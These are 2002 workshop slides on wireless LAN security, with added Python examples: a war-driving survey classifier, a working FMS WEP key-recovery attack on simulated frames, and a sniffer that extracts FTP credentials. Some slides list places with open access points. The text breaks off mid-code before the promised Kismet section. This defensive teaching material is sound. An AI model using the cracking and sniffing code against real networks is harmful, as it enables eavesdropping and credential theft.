PISA Workshop: Wireless LAN Security Live Demo

Supporting Organizations

Presented by PISA members:
• Mr. Alan Tam, CISSP, CCSI, ICI
• Mr. Jim Shek, CISSP, CISA
• Mr. Young, Wo Sang, CISSP, CISA
• Mr. Marco Ho

27 July 2002


Page 1: Title slide (PISA Workshop: Wireless LAN Security Live Demo, 27 July 2002; supporting organizations and presenters as in the title block above)

Page 2: Table of Contents

1. WLAN War Driving in Hong Kong (Jim Shek)
2. WLAN Terms and Security Risks (Young, Wo Sang)
3. Demo I: Home made antenna, so easy! (Jim Shek)
4. Demo II: WEP Weakness and Cracking (Alan Tam)
5. Demo III: Protection from Sniffing by VPN Encryption (Marco Ho)
6. WLAN Protection Strategy (Young, Wo Sang)
7. Demo IV: Protection from Illegal Access with silent SSID (Marco Ho, Alan Tam)
8. The Powerful WLAN Tool: Kismet (Alan Tam)

Page 3: Section 1

Page 4: War Driving in Hong Kong

Wireless LAN Security Live Demo: War Driving in Hong Kong

Jim Shek

Page 5: What is War Driving?

The concept of "war driving" is simple:

You need a device capable of receiving an 802.11b signal, a device capable of moving around, and software that logs what the receiver sees whenever a network is detected. You then move these devices from place to place and let them do their job. Over time you build up a database of network name, signal strength, location, and the IP addresses and namespace in use.

Page 6: War Driving in Hong Kong

• Background:
– Date: Jul 07, 2002
– Time: 11:35am – 1:40pm
– Weather: Isolated showers

Page 7: War Driving in Hong Kong

• Route: Admiralty MTR Station -> Pacific Place -> Tram (Admiralty to Kennedy Town) -> Tram (Kennedy Town to Causeway Bay)

Page 8: War Driving in Hong Kong

• Equipment:
– Notebook + Avaya Gold Wireless LAN card + Windows XP + NetStumbler
– Notebook + Avaya Gold Wireless LAN card + antenna + Windows 2000 + NetStumbler

• Notes:
– The scan speed of NetStumbler was changed to Fastest.

• Participants:
– PISA

Page 9: War Driving in Hong Kong

• Result overview:
– Total number of access points discovered with the antenna: 187
– Total number of access points discovered without the antenna: 52 (a subset of the above)

Chart 1: Antenna Power. Only 28% of the APs (52 of 187) were seen by the notebook without an antenna; the remaining 72% were found only with the antenna.

Page 10: War Driving in Hong Kong

• Result, WEP usage:
– WEP enabled: 43 (23%)
– WEP disabled: 144 (77%)

Chart 2: WEP Usage

Page 11: War Driving in Hong Kong

• Result, SSID usage:
– Default SSID: 77 (41%)
– Non-default SSID: 87 (46%)
– Unknown: 5 (3%)
– Other*: 18 (10%)

Chart 3: SSID Usage

* Other means a well-known SSID, i.e. PCCW and i-cable (public operator networks). Some of the default SSID list is referenced from http://wlana.net/acc_point.htm

Page 12: War Driving in Hong Kong

• Result, top SSIDs:
– default: 27%
– PCCW: 23%
– Times_Square: 14%
– WaveLAN Network: 9%
– linksys: 6%
– My Network: 6%
– tsunami: 6%
– HV24Ap1: 5%
– IEEE 802.11 LAN: 4%

Chart 4: Top SSIDs

Page 13: War Driving in Hong Kong

• Result, channel distribution:

Channel:        1   2   3   4   5   6   7   8   9  10  11
Number of APs: 78   1  13   4   1  18   9   2   6  14  37

Chart 5: Channel ID Setting Behavior. Default channel ID: 71%; non-default channel ID: 29%. (Channels 1, 6 and 11, the usual factory defaults, account for 133 of the 187 APs.)

Page 14: War Driving in Hong Kong

• Interesting observation: building-to-building WLAN

We discovered two APs with the same SSID whose signals were very strong. These two APs stayed in the list for 3 minutes while the tram was moving.

Page 15: War Driving in Hong Kong

• Interesting observation: when the tram was stopped...

When the tram was stopped, APs were easier to discover. One reason is that the software has longer to poll while it is within effective range. This was particularly true for the machine without the antenna.

Page 16: War Driving in Hong Kong

• Interesting observation: the accessibility of APs

Some APs were accessible when the tram was stopped: at several places we came across APs that were ready for us to connect to. Below is the snapshot.

Page 17: War Driving in Hong Kong

• Locations where accessible APs were seen (snapshot): 堅城中心, 創業商場, 西區警局 (Western District Police Station), 上環 MTR (Sheung Wan MTR), 世界書局, 中銀保險 (BOC Insurance), 環球大廈 (World-Wide House), 警察總站 (police headquarters), 大有商場, 英皇中心, 298

Page 18: War Driving in Hong Kong

• Another discovery in Taikoo Place. Background:
– Date: Jul 05, 2002
– Time: 03:00pm – 3:20pm
– Route: within Taikoo Place

• Equipment:
– Notebook + Avaya Gold Wireless LAN card + antenna + Windows 2000 + NetStumbler

• Notes:
– The scan speed of NetStumbler was the default (i.e. medium)

• Participants:
– PISA

Page 19: War Driving in Hong Kong

• Another discovery in Taikoo Place. Overview:
– Total number of access points discovered with the antenna: 30

• WEP usage:
– WEP enabled: 7 (23%)
– WEP disabled: 23 (77%)

• SSID usage:
– Default SSID: 8
– Non-default SSID: 14
– Unknown: 2
– Other*: 6
– (Problem SSID, i.e. default or well-known: 14 of 30, 47%)

• Channel distribution:

Channel:        1   3   5   6   7   8   9  11
Number of APs: 17   1   2   4   1   1   1   3

(Default channel: 80%, i.e. channels 1, 6 and 11 account for 24 of the 30 APs)
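The two surveys above were tallied by hand from NetStumbler lists. The script below is an added example, not part of the PISA material, that reproduces the same classification (WEP on/off, default versus non-default SSID, default versus other channel, "problem SSID") over scan records so a site owner can run it on their own export. The default-SSID set is an assumption built from the SSIDs the slides treat as vendor defaults, the well-known set from the two operator SSIDs the slides name, and the default-channel set from the 1/6/11 pattern the charts show; the scan records are constructed sample data.

```python
# Added example (not from the PISA slides): classify a war-driving scan the way the
# survey slides do. DEFAULT_SSIDS, WELL_KNOWN_SSIDS and DEFAULT_CHANNELS are assumptions
# drawn from the slides' charts; extend them from a list such as the wlana.net page cited above.
from collections import Counter

DEFAULT_SSIDS = {"default", "linksys", "tsunami", "wavelan network", "ieee 802.11 lan"}
WELL_KNOWN_SSIDS = {"pccw", "i-cable"}     # public-operator networks, "Other" on the slides
DEFAULT_CHANNELS = {1, 6, 11}              # assumption: factory channels most APs ship on

# Constructed sample: one record per AP, the fields a NetStumbler export provides.
SAMPLE_SCAN = [
    {"ssid": "default",      "bssid": "00:02:2d:01:02:03", "channel": 1,  "wep": False},
    {"ssid": "PCCW",         "bssid": "00:02:2d:04:05:06", "channel": 6,  "wep": False},
    {"ssid": "Times_Square", "bssid": "00:04:5a:07:08:09", "channel": 3,  "wep": True},
    {"ssid": "linksys",      "bssid": "00:04:5a:0a:0b:0c", "channel": 6,  "wep": False},
    {"ssid": "",             "bssid": "00:40:96:0d:0e:0f", "channel": 11, "wep": True},
    {"ssid": "tsunami",      "bssid": "00:40:96:10:11:12", "channel": 10, "wep": False},
]


def classify_ssid(ssid):
    """Bucket an SSID as the slides do: default, other (well-known), non-default, unknown."""
    s = ssid.strip().lower()
    if not s:
        return "unknown"
    if s in DEFAULT_SSIDS:
        return "default"
    if s in WELL_KNOWN_SSIDS:
        return "other"
    return "non-default"


def summarize(scan):
    """Percentages matching Charts 2, 3 and 5 plus the Taikoo Place 'problem SSID' figure."""
    total = len(scan)
    ssid_classes = Counter(classify_ssid(ap["ssid"]) for ap in scan)
    wep_on = sum(1 for ap in scan if ap["wep"])
    default_ch = sum(1 for ap in scan if ap["channel"] in DEFAULT_CHANNELS)
    problem = ssid_classes["default"] + ssid_classes["other"]   # default + well-known
    return {
        "total": total,
        "wep_enabled_pct": round(100 * wep_on / total),
        "default_channel_pct": round(100 * default_ch / total),
        "problem_ssid_pct": round(100 * problem / total),
        "ssid_classes": dict(ssid_classes),
        "channels": dict(Counter(ap["channel"] for ap in scan)),
    }


def exposed_aps(scan):
    """APs that are both unencrypted and still on a vendor default SSID: the easiest targets."""
    return [ap["bssid"] for ap in scan
            if not ap["wep"] and classify_ssid(ap["ssid"]) == "default"]


if __name__ == "__main__":
    print(summarize(SAMPLE_SCAN))
    print("unencrypted + default SSID:", exposed_aps(SAMPLE_SCAN))
```

Feed it the SSID, BSSID, channel and WEP flag columns of a real export and the percentages are directly comparable with the charts on Pages 10 to 13.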

Page 20: Section 2

Page 21: Wireless LAN Terms and Security Risks

Young, Wo Sang

Page 22: What is a Wireless LAN?

• It is a LAN
• An extension of the wired LAN
• Uses high-frequency radio waves (RF)
• Speed: 2 Mbps to 54 Mbps
• Distance: 100 feet to 15 miles

Page 23: WLAN Terms & Basic Concept

• 802.11: IEEE family of specifications for WLANs; the original standard, 2.4 GHz, 2 Mbps
• 802.11a: 5 GHz, 54 Mbps
• 802.11b: often called Wi-Fi, 2.4 GHz, 11 Mbps
• 802.11e: QoS and multimedia support for 802.11b and 802.11a
• 802.11g: 2.4 GHz, 54 Mbps
• 802.11i: security enhancements intended to replace WEP (still a draft in 2002)
• 802.1x: port-based authentication framework for all Ethernet-like networks

Page 24: WLAN Terms & Basic Concept

• Access Point (AP): a device that serves as a communications "hub" for wireless clients and provides a connection to the wired LAN
• Beacon: a message transmitted at regular intervals by the AP; used to advertise the network and to let clients maintain, optimize and automatically establish their connection to the AP

Page 25: WLAN Terms & Basic Concept

• Ad Hoc Mode: wireless client-to-client communication; the opposite is Infrastructure Mode

Page 26: WLAN Terms & Basic Concept

• Infrastructure Mode: a client setting providing connectivity through an AP, as opposed to Ad Hoc Mode (figure: clients communicating via the AP)

Page 27: WLAN Terms & Basic Concept

• SSID and BSSID. The BSSID (Basic Service Set Identifier) identifies one basic service set; in infrastructure mode it is the MAC address of the AP. The SSID is the network name the AP announces in its beacons (figure: an AP sending beacons to its clients).
• BSS: an AP together with the wireless clients associated with it is referred to as a Basic Service Set

Page 28: WLAN Terms & Basic Concept

• ESSID (Extended Service Set Identifier): the SSID shared by all APs of one extended service set
• ESS: to increase the range and coverage of the wireless network, one adds more strategically placed APs to increase density. The set of BSSs sharing one SSID is referred to as an Extended Service Set

Page 29: WLAN Terms & Basic Concept

• WEP: the optional cryptographic confidentiality algorithm of 802.11

Page 30: WLAN Terms & Basic Concept

• Channel (figure)

Page 31: WLAN Terms & Basic Concept

• DSSS channels (figure: channels 1 to 11 plotted against frequency in GHz, with ticks at 2.400, 2.412, 2.437, 2.462 and 2.474). The 2.4 GHz band is divided into DSSS channels whose centre frequencies are 5 MHz apart: channel 1 at 2.412 GHz, channel 6 at 2.437 GHz, channel 11 at 2.462 GHz. Each channel is about 22 MHz wide, so neighbouring channels overlap; only channels 1, 6 and 11 are mutually non-overlapping, which is why they are the usual defaults.

Page 32: WLAN Terms & Basic Concept

• Channel (figure)

Page 33: WLAN Terms & Basic Concept

• DSSS: Direct Sequence Spread Spectrum. An RF carrier and a pseudo-random pulse train are mixed to make a noise-like wide-band signal.
• FHSS: Frequency Hopping Spread Spectrum. Transmit on one frequency for a certain time, then jump pseudo-randomly to another and transmit again.

Page 34: Reading the Signal Strength

• dBm: decibels referenced to 1 milliwatt (usually into a 50 Ω impedance): dBm = 10 × log10(P / 1 mW), e.g. 0 dBm = 1 mW, and every 3 dB halves or doubles the power.
• Attenuation/gain revision: dB = 10 × log10(output / input). If output > input, dB is positive (gain); if output < input, dB is negative (loss).

Page 35: WLAN Terms & Basic Concept

• Signal Level & Noise Level (figure: signal level (SL) plotted against noise level (NL) for three cases; the usable margin is the gap between them)

Page 36: WLAN Risk

• Unauthorized clients (figure: a malicious client in range of the AP, a client out of range, and a detector)

Page 37: WLAN Risk

• Unauthorized or renegade access points
• Interception and unauthorized monitoring of wireless traffic
• Client-to-client attacks
• Jamming (DoS)

(figure: a malicious station jamming the AP and attacking another client directly)

Page 38: WLAN Risk: Fake Access Point

• Access point clone (evil twin) for traffic interception (figure: legitimate AP1 and the impostor AP1* advertising the same SSID)

Page 39: WLAN Risk

• Brute-force attacks against access point passwords
• WEP weakness
• "Mis-configurations": SSIDs, SNMP community strings (RO & RW), administration interfaces (web, telnet, serial), installation

Page 40: WLAN Risk

• Deployment: internal network?! DMZ?! Who can install an AP? When was it installed? Where are the APs installed?
• Many $$ are spent securing the wired network, and a user spends HK$2,000 on an AP to bypass it

Page 41: WLAN Risk

• Low-cost products are prevalent: limited features, insecure
• Accidental detection: the wireless card itself lists nearby networks

Page 42: Section 3

Page 43: Demo I: Home made antenna, so easy

Jim Shek

Page 44: Home made antenna, so easy

• Use available materials to hand-make an antenna with a gain of 3 dB to 11 dB (real object shown)
• Compare with a commercial antenna of 6 dB gain costing HKD 600+
• Dimensions are the key to success; measurements are available by web search
• With an antenna the results of war driving improve greatly, and so does the risk of your WLAN being exposed to hacking!

Page 45: Section 4

Page 46: Demo II: WEP Weakness and Cracking

Alan Tam

Page 47: WEP Weakness

• Background
• Weakness in the KSA of RC4
• Proof of concept
• Some counter actions

Page 48: The magic RFMON mode

• Property: like promiscuous mode on a wired NIC, but listen (receive) only; also known as "monitor mode"
• Chipsets capable of RFMON (i.e. with open specifications): Cisco Aironet; cards based on Intersil Prism2; Orinoco (well, not officially)

Page 49: What do Linux hackers use?

• NIC drivers: wlan-ng 0.1.13+ with patch, or 0.1.14pre?+; orinoco_cs 0.09b+ with patch
• libpcap with the PF_PACKET interface, patched to interpret 802.11b packets (for example 0.7.1 with patch)
• Prism driver & Orinoco patch: ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/ and http://airsnort.shmoo.com/orinocoinfo.html

Page 50: WEP

• Stands for Wired Equivalent Privacy
• Symmetric encryption algorithm: RC4
• Commercially claimed key size: 40 or 128 bit (as of April 2002)
• At the back: 40-bit secret key + 24-bit IV = 64-bit packet key; 104-bit secret key + 24-bit IV = 128-bit packet key
• IV = Initialization Vector, prepended to the secret key and sent in the clear with every frame

Page 51: Weaknesses in the KSA of RC4

• Presented in a paper by Scott Fluhrer, Itsik Mantin and Adi Shamir
• Invariance weakness: existence of a large class of weak keys
• IV weakness: related-key vulnerability

Page 52: WEP Attack

• Invariance weakness: WEP packet distinguisher
• IV weakness: exists in a commonly used mode of RC4 (a public IV concatenated with the secret key, exactly what WEP does)
• Properties: cryptanalytic attack, generally faster than brute force; passive ciphertext-only attack, zero knowledge needed (the first plaintext byte of every frame is the fixed SNAP header, so the first keystream byte is known)
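To make the WEP construction on Page 50 and the IV weakness on Pages 51 and 52 concrete, here is an added simulation that is not part of the PISA material and not the code of AirSnort or WEPCrack. It builds WEP-40 frames exactly as the standard does (IV || secret key into RC4, CRC-32 ICV), then runs the Fluhrer-Mantin-Shamir attack against them: for the canonical weak IVs (B+3, 255, X) the first keystream byte, recovered from the known SNAP byte 0xAA, votes for secret key byte B with probability of about 5%. The secret key, the IVs and the frame payloads are constructed here; an attacker on the air would have to wait for the weak IVs, which is where the "5 to 10 million packets" on Page 54 comes from.

```python
# Added example, not from the PISA slides or from AirSnort/WEPCrack: self-contained
# simulation of WEP-40 (RC4 keyed with IV || secret) and of the FMS "IV weakness".
# SECRET, the IVs and the payloads are constructed; nothing is captured off the air.
import struct
import zlib

N = 256
SNAP0 = 0xAA                       # first plaintext byte of every LLC/SNAP data frame: known
SECRET = b"\x1f\x2e\x3d\x4c\x5b"   # constructed 40-bit WEP key under attack


def ksa(key):
    """RC4 key-scheduling algorithm."""
    s = list(range(N))
    j = 0
    for i in range(N):
        j = (j + s[i] + key[i % len(key)]) % N
        s[i], s[j] = s[j], s[i]
    return s


def rc4_stream(key, n):
    """First n bytes of RC4 keystream for key."""
    s = ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % N
        j = (j + s[i]) % N
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % N])
    return bytes(out)


def wep_encrypt(secret, iv, payload):
    """WEP frame body: 3-byte IV in the clear, then RC4(iv || secret) XOR (payload || CRC-32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    keystream = rc4_stream(iv + secret, len(payload) + 4)
    return iv + bytes(a ^ b for a, b in zip(payload + icv, keystream))


def wep_decrypt(secret, frame):
    """Return the payload if the ICV verifies under secret, else None."""
    iv, body = frame[:3], frame[3:]
    plain = bytes(a ^ b for a, b in zip(body, rc4_stream(iv + secret, len(body))))
    payload, icv = plain[:-4], plain[-4:]
    return payload if struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF) == icv else None


def fms_vote(iv, prefix, z):
    """FMS: given a frame's IV, the secret bytes recovered so far (prefix) and the first
    keystream byte z, return the vote for the next secret byte, or None when the IV does
    not leave the KSA in a 'resolved' state. A vote is right with probability about 5%."""
    b = len(prefix)                   # index of the secret byte under attack
    known = iv + prefix               # attacker knows the first b+3 bytes of the RC4 key
    s = list(range(N))
    j = 0
    for i in range(b + 3):            # run the KSA only as far as the known key bytes allow
        j = (j + s[i] + known[i]) % N
        s[i], s[j] = s[j], s[i]
    if s[1] >= b + 3 or (s[1] + s[s[1]]) % N != b + 3:
        return None                   # not resolved: z tells nothing about this key byte
    return (s.index(z) - j - s[b + 3]) % N


def capture_weak_frames(secret, key_len):
    """Simulate a sniffer that kept one frame for every canonical weak IV (B+3, 255, X).
    On the air these are roughly 1 in 65,000 frames per key byte."""
    frames = {}
    payload = bytes([SNAP0, 0xAA, 0x03]) + b"\x00" * 29   # LLC/SNAP header + constructed body
    for b in range(key_len):
        for x in range(N):
            iv = bytes([b + 3, 255, x])
            frames[iv] = wep_encrypt(secret, iv, payload)
    return frames


def fms_recover(frames, key_len, width=8):
    """Recover the key byte by byte: rank candidates by FMS votes, try the top `width`
    at each position, and accept a full key only if it decrypts a frame with a valid ICV."""
    check = next(iter(frames.values()))

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_decrypt(prefix, check) is not None else None
        b = len(prefix)
        votes = [0] * N
        for x in range(N):
            iv = bytes([b + 3, 255, x])
            z = frames[iv][3] ^ SNAP0          # ciphertext byte 0 XOR known plaintext
            guess = fms_vote(iv, prefix, z)
            if guess is not None:
                votes[guess] += 1
        for cand in sorted(range(N), key=lambda k: -votes[k])[:width]:
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


if __name__ == "__main__":
    captured = capture_weak_frames(SECRET, len(SECRET))
    key = fms_recover(captured, len(SECRET))
    print("recovered key:", key.hex() if key else "not found")
```

The ICV check in `fms_recover` is what a real cracker does too: a vote count is only evidence, so the candidate has to decrypt a captured frame to a valid CRC before it is reported. Note that the same `fms_vote` test (resolved or not) is exactly the filter Kismet applies when it logs "cryptographically weak" packets (Page 78).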

Page 53: Proof of Concept

• Adam Stubblefield, AT&T Labs: http://www.cs.rice.edu/~astubble/wep
• WEPCrack: http://sourceforge.net/projects/wepcrack
• AirSnort: http://airsnort.shmoo.com/

Page 54: Case Study: AirSnort

• Maintained by The Shmoo Group
• An X Windows application
• Supported platforms: Cisco Aironet, Prism, Orinoco
• Requires approx. 5-10 million encrypted packets to break a key

Page 55: TKIP

• Temporal Key Integrity Protocol; initially referred to as WEP2
• 128-bit temporal key (TK) mixed with the client's 48-bit MAC address
• 16-octet IV (as in the draft at the time)
• RC4 (still)
• TK changed every 10,000 packets

Page 56: Reference

• Technical knowledge: http://www.qsl.net/n9zia/wireless/index.html and http://www.80211-planet.com/tutorials
• Access point MAC addresses: http://aptools.sourceforge.net/

Page 57: Reference

• Linux resources: http://www.hpl.hp.com/personal/Jean_Tourrilhes/index.html, http://lists.samba.org/listinfo/wireless, http://airtraf.sourceforge.net/

Page 58: Section 5

Page 59: Demo III: Securing Wireless Networks by VPN

Marco Ho

Page 60: Secure Protocols for Encryption

Figure: where each protection sits in the stack between a wireless client, the router/AP and a wired server.

Wireless client: Application (SSL) / Transport (TCP, UDP) / Network (IP) (VPN) / 802.11b Link (WEP) / 802.11b Physical
Router: Network (IP); 802.11b Link (WEP) and 802.11b Physical on the wireless side; Ethernet Link and Ethernet Physical on the wired side
Wired server: Application (SSL) / Transport (TCP, UDP) / Network (IP) (VPN) / Ethernet Link / Ethernet Physical

WEP covers only the wireless hop and ends at the router; a network-level VPN or application-level SSL protects the traffic end to end.

Page 61: Network Level Encryption (VPN)

Advantages
• Encryption of multiple protocols
• Hides the network routing (with proper configuration)

Choices
1. PPTP
• Comes with W2K RRAS
• Simpler and easier to configure
2. IPsec
• More secure
• Microsoft: L2TP over IPsec using 3DES
• Use certificates (instead of pre-shared keys) to further improve security: mutual authentication

Page 62: Real Life Demo with PPTP

• VPN server: Microsoft VPN Server (RRAS + PPTP)
• Encryption: MPPE 128 (Microsoft Point-to-Point Encryption)
• Authentication: MS-CHAP v2

Remark: WEP turned off for demonstration purposes. (Caveat for deployment: PPTP with MS-CHAP and MPPE had published cryptanalytic weaknesses by 1999, which is why the previous page rates IPsec as the more secure choice.)

Page 63: Sniffing Tools

• Two sniffing tools were used to capture traffic and packet contents:
– Ethereal: freeware, available on Linux and Win32
– Iris: commercial product, 15-day evaluation available; strong decode function to ease protocol session tracking

Page 64: Without VPN Encryption

Figure (demo topology):
• Access point: IP 10.0.0.1, no WEP
• Sniffer: IP 10.0.0.15
• "A": FTP client, IP 10.0.0.20
• "B": FTP server, IP 10.0.0.25

"A" FTPs to "B": the session is clear text at every hop, so the sniffer reads the log-in and the data.

Page 65: With VPN Encryption

Figure (demo topology):
• Access point: IP 10.0.0.1, no WEP
• VPN gateway: wireless side IP 10.0.0.10, Ethernet side IP 192.168.1.230, running the VPN server (PPTP)
• "D": FTP server, IP 192.168.1.254 (wired segment)
• "A": VPN client and FTP client, IP 10.0.0.20
• "C": sniffer, IP 10.0.0.15

"A" FTPs to "D" through the VPN: on the wireless segment the sniffer sees only the encrypted tunnel; clear text appears only on the wired segment behind the VPN server.
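The two demo set-ups above are easy to reproduce as a check. The code below is an added example, not the Ethereal or Iris captures from the workshop: it is the test a sniffer at 10.0.0.15 would run over captured frames, pulling FTP USER/PASS commands out of clear-text TCP and finding nothing in the PPTP case, where the same log-in travels inside GRE (IP protocol 47) to the VPN server at 10.0.0.10. The frames are constructed inline with the addresses from the figures; the GRE payload bytes are placeholders standing in for the MPPE ciphertext.

```python
# Added example (not the slides' captures): what the wireless-side sniffer can extract
# from FTP in the clear versus FTP inside a PPTP (GRE) tunnel. Frames are constructed.
import socket
import struct

IPPROTO_TCP, IPPROTO_GRE = 6, 47


def ipv4_header(src, dst, proto, payload_len):
    """Minimal IPv4 header (checksum left zero; the parser below does not verify it)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))


def tcp_segment(sport, dport, payload):
    """20-byte TCP header (PSH/ACK, no options) followed by payload."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload


def ethernet(payload):
    """Ethernet II frame: constructed MACs for client A and the next hop, EtherType IPv4."""
    return b"\x00\x02\x2d\x00\x00\x25" + b"\x00\x02\x2d\x00\x00\x20" + b"\x08\x00" + payload


def ftp_frame(text):
    """Clear-text FTP command from A (10.0.0.20) to FTP server B (10.0.0.25), as on Page 64."""
    tcp = tcp_segment(1025, 21, text)
    return ethernet(ipv4_header("10.0.0.20", "10.0.0.25", IPPROTO_TCP, len(tcp)) + tcp)


def pptp_frame(ciphertext):
    """PPTP data from A to the VPN server (10.0.0.10): GRE carrying MPPE-encrypted PPP (Page 65).
    The GRE header is the RFC 2637 enhanced form; ciphertext is a placeholder."""
    gre = struct.pack("!HHHHI", 0x3001, 0x880B, len(ciphertext), 1, 0) + ciphertext
    return ethernet(ipv4_header("10.0.0.20", "10.0.0.10", IPPROTO_GRE, len(gre)) + gre)


def extract_ftp_credentials(frame):
    """Return ('USER'|'PASS', value) if frame is a clear-text FTP command carrying one, else None."""
    if frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != IPPROTO_TCP:
        return None                       # GRE, ESP, ...: opaque without the tunnel key
    tcp = ip[ihl:]
    dport = struct.unpack("!H", tcp[2:4])[0]
    if dport != 21:
        return None
    payload = tcp[(tcp[12] >> 4) * 4:]
    line = payload.split(b"\r\n", 1)[0].decode("ascii", "replace")
    verb, _, arg = line.partition(" ")
    return (verb.upper(), arg) if verb.upper() in ("USER", "PASS") else None


def audit(frames):
    """Credentials a passive sniffer on the wireless segment can read from a capture."""
    return [c for c in map(extract_ftp_credentials, frames) if c]


# Constructed captures for the two demo set-ups.
CLEAR_CAPTURE = [ftp_frame(b"USER alice\r\n"), ftp_frame(b"PASS s3cret\r\n")]
VPN_CAPTURE = [pptp_frame(b"\x9a\x1f\x07\xc3\x55\xe2\x0b\x6d"),
               pptp_frame(b"\x41\x88\xd2\x0c\x7e\x13\xa9\x30")]

if __name__ == "__main__":
    print("without VPN:", audit(CLEAR_CAPTURE))
    print("with VPN:   ", audit(VPN_CAPTURE))
```

The point the figures make is visible in `extract_ftp_credentials`: the sniffer's parser stops at the IP protocol field for the tunnelled frames, exactly as Ethereal's FTP decoder does, because everything after the GRE header is ciphertext.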

Page 66: Section 6

Page 67: Wireless LAN Protection Strategies

Young, Wo Sang

Page 68: Recommendation (I)

• Wireless LAN related configuration:
– Enable WEP, use a 128-bit key*
– Drop non-encrypted packets
– Disable SSID broadcasts
– No SNMP access
– Choose a complex admin password
– Enable the firewall function
– Use MAC (hardware) address filtering to restrict access
– Non-default access point password
– Change the default access point name
– Use 802.1x [warning]

Page 69: EAP-enabled Authentication (figure)

Page 70: Recommendation (II)

• Deployment considerations:
– Closed network*
– Treat the wireless LAN as an external network
– VPN and strong encryption
– No DHCP (use fixed private IPs)
– Install on a separate network

Page 71: Recommendation (III)

• Always (wired or wireless):
– Install virus protection software with automatic, frequent pattern-file updates
– Shared folders must require a password

• Management issues:
– Prohibit installing an AP without authorization
– Constantly discover any new APs (NetStumbler is free, an antenna is cheap)
– Power off the ADSL modem when Internet access is not required
– Carefully select the physical location of your AP: not near windows or front doors

Page 72: The [warning] of 802.1x

• Session hijacking: the attacker waits until a legitimate client has authenticated successfully, then, acting as the AP, tells the client "you are disconnected" (a spoofed disassociation). The AP still believes the client is present, and the attacker takes over its session.
• Man-in-the-middle attack: 802.1x as then specified is a one-way authentication mechanism (the network authenticates the client, not the reverse), so the attacker acts as an AP towards the client and as a user towards the real AP.

Reference: http://www.infoworld.com/articles/hn/xml/02/02/14/020214hnwifispec.xml (InfoWorld report, February 2002, on the Mishra and Arbaugh analysis of 802.1X)

Page 73: The workaround to the [warning] of 802.1x

• Vendor-proprietary implementations: "rekeying" of WEP
• "Standard": TKIP, or Temporal Key Integrity Protocol, changes the encryption key about every 10,000 packets

Page 74: Section 7

Page 75: Demo IV: Silent WLAN Access Point

Marco Ho & Alan Tam

Page 76: Disabling SSID insertion

• Method 1: vendor utility. It may use HTTP or SNMP to set the SSID.
• Method 2: use AP Utils, run under Linux: http://ap-utils.polesye.net/ (manages the AP by SNMP). Supported platforms:
– ATMEL chipset (e.g. Linksys WAP11, D-Link DWL-900AP, PCi AP-11S)
– NWN chipset (e.g. Compex WavePort WP11)

Caveat: a silent SSID only blanks the SSID in beacons. The AP still returns it in probe responses and clients still send it in probe and association requests, so a passive monitor such as Kismet (Section 8) recovers it. Treat it as a way to stay off casual NetStumbler lists, not as access control.
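What "silent SSID" changes on the air is easiest to see with the frames themselves. The following is an added example, not part of the PISA demo and not ap-utils or vendor code: it constructs beacon and probe-response management frames in 802.11 layout (24-byte header, 12 bytes of fixed fields, then tagged parameters with tag 0 = SSID), parses them the way a monitor-mode sniffer would, and shows that a hidden network appears with an empty SSID in beacons until the first probe response gives it away. The BSSID, client address and network name are constructed.

```python
# Added example (not ap-utils or a vendor utility): beacon vs. probe response for a
# "silent" AP, as a monitor-mode sniffer sees them. BSSID, client MAC and SSID are constructed.
import struct

BSSID = bytes.fromhex("00022d000001")
BROADCAST = b"\xff" * 6
SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 5, 8
TAG_SSID, TAG_RATES, TAG_CHANNEL = 0, 1, 3


def mgmt_frame(subtype, dst, src, ies):
    """802.11 management frame: frame control (type 0), duration, addr1, addr2, addr3 (BSSID),
    sequence control, then the fixed fields beacons/probe responses carry, then the IEs."""
    header = struct.pack("<HH6s6s6sH", subtype << 4, 0, dst, src, src, 0)
    fixed = struct.pack("<QHH", 0, 100, 0x0011)   # timestamp, beacon interval, capabilities (ESS + privacy)
    body = b"".join(struct.pack("BB", tag, len(val)) + val for tag, val in ies)
    return header + fixed + body


def beacon(ssid, hidden=False):
    """Broadcast beacon; a silent AP sends a zero-length SSID element instead of the name."""
    ssid_ie = b"" if hidden else ssid
    return mgmt_frame(SUBTYPE_BEACON, BROADCAST, BSSID,
                      [(TAG_SSID, ssid_ie), (TAG_RATES, b"\x82\x84\x8b\x96"), (TAG_CHANNEL, b"\x06")])


def probe_response(ssid, client):
    """Unicast reply to a probing station; it always carries the real SSID."""
    return mgmt_frame(SUBTYPE_PROBE_RESP, client, BSSID,
                      [(TAG_SSID, ssid), (TAG_RATES, b"\x82\x84\x8b\x96"), (TAG_CHANNEL, b"\x06")])


def parse_mgmt(frame):
    """Decode subtype, BSSID (addr3), SSID and channel from a beacon or probe response."""
    fc = struct.unpack("<H", frame[:2])[0]
    ies, pos = {}, 36                     # 24-byte header + 12 bytes of fixed fields
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        ies[tag] = frame[pos + 2:pos + 2 + length]
        pos += 2 + length
    return {"subtype": (fc >> 4) & 0xF, "bssid": frame[16:22].hex(":"),
            "ssid": ies.get(TAG_SSID, b""), "channel": ies.get(TAG_CHANNEL, b"\x00")[0]}


def observed_ssids(frames):
    """BSSID -> SSID as a passive sniffer learns it: beacons register the AP, and any
    probe response (or a non-hidden beacon) fills in the name."""
    seen = {}
    for f in frames:
        info = parse_mgmt(f)
        if info["subtype"] not in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
            continue
        if info["ssid"] or info["bssid"] not in seen:
            seen[info["bssid"]] = info["ssid"].decode("utf-8", "replace")
    return seen


if __name__ == "__main__":
    hidden = beacon(b"PISA-DEMO", hidden=True)
    print("beacons only:       ", observed_ssids([hidden]))
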